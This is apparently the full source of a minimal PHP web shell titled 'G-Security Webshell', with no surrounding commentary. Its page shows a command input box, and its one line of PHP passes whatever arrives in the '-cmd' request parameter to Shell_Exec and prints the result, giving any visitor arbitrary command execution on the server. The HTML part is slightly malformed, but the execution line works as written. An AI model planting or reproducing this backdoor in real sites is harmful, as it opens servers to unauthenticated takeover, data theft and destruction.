<title>G-Security Webshell</title><body bgcolor=#000000 text=#ffffff ">

<input type=TEXT name="-cmd" size=64 value="=$cmd" style="background:#000000;color:#ffffff;"><hr><pre></pre>
$cmd = $_REQUEST["-cmd"]; if($cmd != "") print Shell_Exec($cmd);